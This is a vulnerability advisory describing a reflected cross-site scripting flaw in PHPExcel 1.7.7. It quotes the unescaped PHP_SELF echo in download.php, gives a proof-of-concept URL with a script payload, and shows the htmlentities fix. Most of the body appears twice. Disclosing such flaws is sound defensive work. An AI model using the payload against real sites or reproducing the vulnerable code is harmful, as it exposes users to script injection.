SSCHADV2012-020 - PHPExcel 1.7.7 Cross-Site Scripting vulnerability
Advisory:
|
PHPExcel 1.7.7 Cross-Site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2012-020
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on PHPExcel 1.7.7
|
Vendor URL:
|
|
Vendor Status:
|
informed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
PHPExcel 1.7.7 is prone to a Cross-Site Scripting vulnerability
======================
Vulnerable code
======================
//download.php
<li><a href=’<?php echo $_SERVER[‘PHP_SELF’]."?op=download"; ?>’><?php echo $tarName ?></a></li>
======================
PoC-Exploit
======================
http://[target]/PHPExcel/Shared/JAMA/docs/download.php/ ‘><script>alert(‘xss’)</script>
======================
Solution
======================
<li><a href=’<?php echo htmlentities($_SERVER[‘PHP_SELF’])."?op=download"; ?>’><?php echo $tarName ?></a></li>
======================
Disclosure Timeline
======================
21-Aug-2012 – developer informed
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-020.txt
Vulnerable code
======================
//download.php
<li><a href=’<?php echo $_SERVER[‘PHP_SELF’]."?op=download"; ?>’><?php echo $tarName ?></a></li>
======================
PoC-Exploit
======================
http://[target]/PHPExcel/Shared/JAMA/docs/download.php/ ‘><script>alert(‘xss’)</script>
======================
Solution
======================
<li><a href=’<?php echo htmlentities($_SERVER[‘PHP_SELF’])."?op=download"; ?>’><?php echo $tarName ?></a></li>
======================
Disclosure Timeline
======================
21-Aug-2012 – developer informed
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-020.txt
Comments
Display comments as Linear | Threaded